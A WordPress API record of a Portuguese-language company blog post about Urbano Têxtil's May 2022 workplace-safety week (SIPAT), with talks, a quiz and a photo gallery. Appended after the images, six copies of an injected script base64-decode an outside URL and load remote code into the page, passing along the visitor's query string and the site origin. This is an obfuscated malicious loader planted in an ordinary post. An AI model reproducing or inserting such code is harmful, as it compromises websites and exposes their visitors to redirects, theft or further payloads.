{"id":1322,"date":"2022-05-25T14:57:58","date_gmt":"2022-05-25T17:57:58","guid":{"rendered":"https:\/\/www.urbanotextil.com.br\/?p=1322"},"modified":"2024-09-20T20:53:03","modified_gmt":"2024-09-20T23:53:03","slug":"semana-sipat-urbano-textil","status":"publish","type":"post","link":"https:\/\/www.urbanotextil.com.br\/en\/semana-sipat-urbano-textil\/","title":{"rendered":"Semana SIPAT Urbano T\u00eaxtil"},"content":{"rendered":"<p>A Urbano T\u00eaxtil realizou diversas atividades referentes a SIPAT (Semana Interna de Preven\u00e7\u00e3o de Acidentes do Trabalho), que iniciou na segunda-feira (16\/05) e finalizou na \u00faltima sexta-feira (20\/05).<br \/>\nAl\u00e9m de palestras de conscientiza\u00e7\u00e3o, apresentamos tamb\u00e9m a nossa Cole\u00e7\u00e3o de inverno para os nossos colaboradores, enfatizando a import\u00e2ncia da seguran\u00e7a no trabalho durante o processo fabril para garantir o melhor resultado.<br \/>\nA programa\u00e7\u00e3o se encerrou com um quiz de perguntas. Nele, perguntas gerais e principalmente relacionadas \u00e0 seguran\u00e7a desafiaram os colaboradores a responderem e a concorrerem a pr\u00eamios.<br \/>\nO objetivo foi movimentar e engajar nossos colaboradores com a causa, a fim de trazer ainda mais conscientiza\u00e7\u00e3o e preven\u00e7\u00e3o de uma forma din\u00e2mica e intuitiva.<\/p>\n<p>Confira algumas fotos que registraram estes momentos!<\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" width=\"1080\" height=\"1080\" class=\"alignnone size-medium wp-image-1301\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:300\/h:300\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar.jpg\" alt=\"\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar.jpg 1080w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-300x300.jpg 300w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-150x150.jpg 150w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-12x12.jpg 12w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/> <img decoding=\"async\" width=\"1080\" height=\"1080\" class=\"alignnone size-medium wp-image-1323\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:300\/h:300\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-2-1.jpg\" alt=\"\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-2-1.jpg 1080w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-2-1-300x300.jpg 300w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-2-1-150x150.jpg 150w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-2-1-12x12.jpg 12w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/> <img decoding=\"async\" width=\"1080\" height=\"1080\" class=\"alignnone size-medium wp-image-1324\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:300\/h:300\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-3-1.jpg\" alt=\"\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-3-1.jpg 1080w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-3-1-300x300.jpg 300w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-3-1-150x150.jpg 150w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-3-1-12x12.jpg 12w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/> <img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" class=\"alignnone size-medium wp-image-1325\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:300\/h:300\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-4-1.jpg\" alt=\"\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-4-1.jpg 1080w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-4-1-300x300.jpg 300w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-4-1-150x150.jpg 150w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-4-1-12x12.jpg 12w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/> <img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" class=\"alignnone size-medium wp-image-1326\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:300\/h:300\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-5-1.jpg\" alt=\"\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-5-1.jpg 1080w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-5-1-300x300.jpg 300w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-5-1-150x150.jpg 150w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-5-1-12x12.jpg 12w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/> <img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" class=\"alignnone size-medium wp-image-1327\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:300\/h:300\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-6-1.jpg\" alt=\"\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-6-1.jpg 1080w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-6-1-300x300.jpg 300w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-6-1-150x150.jpg 150w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-6-1-12x12.jpg 12w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/> <img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" class=\"alignnone size-medium wp-image-1328\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:300\/h:300\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-7-1.jpg\" alt=\"\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-7-1.jpg 1080w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-7-1-300x300.jpg 300w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-7-1-150x150.jpg 150w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-7-1-12x12.jpg 12w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/> <img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" class=\"alignnone size-medium wp-image-1329\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:300\/h:300\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-8-1.jpg\" alt=\"\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-8-1.jpg 1080w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-8-1-300x300.jpg 300w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-8-1-150x150.jpg 150w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-8-1-12x12.jpg 12w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/> <img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" class=\"alignnone size-medium wp-image-1330\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:300\/h:300\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-9-1.jpg\" alt=\"\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-9-1.jpg 1080w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-9-1-300x300.jpg 300w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-9-1-150x150.jpg 150w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-copiar-9-1-12x12.jpg 12w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/> \u00a0<img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" class=\"alignnone size-medium wp-image-1332\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:300\/h:300\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-1.jpg\" alt=\"\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-1.jpg 1080w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-1-300x300.jpg 300w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-1-150x150.jpg 150w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/05\/Prancheta-1-1-12x12.jpg 12w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A Urbano T\u00eaxtil realizou diversas atividades referentes a SIPAT (Semana Interna de Preven\u00e7\u00e3o de Acidentes do Trabalho), que iniciou na segunda-feira (16\/05) e finalizou na \u00faltima sexta-feira (20\/05). Al\u00e9m de palestras de conscientiza\u00e7\u00e3o, apresentamos tamb\u00e9m a nossa Cole\u00e7\u00e3o de inverno para os nossos colaboradores, enfatizando a import\u00e2ncia da seguran\u00e7a no trabalho durante o processo fabril [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":1332,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_coblocks_attr":"","_coblocks_dimensions":"","_coblocks_responsive_height":"","_coblocks_accordion_ie_support":"","footnotes":""},"categories":[10,57],"tags":[],"wt_blog_author":[],"class_list":["post-1322","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-palestras","category-sipat"],"_links":{"self":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts\/1322","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/comments?post=1322"}],"version-history":[{"count":8,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts\/1322\/revisions"}],"predecessor-version":[{"id":2143,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts\/1322\/revisions\/2143"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/media\/1332"}],"wp:attachment":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/media?parent=1322"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/categories?post=1322"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/tags?post=1322"},{"taxonomy":"wt_blog_author","embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/wt_blog_author?post=1322"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}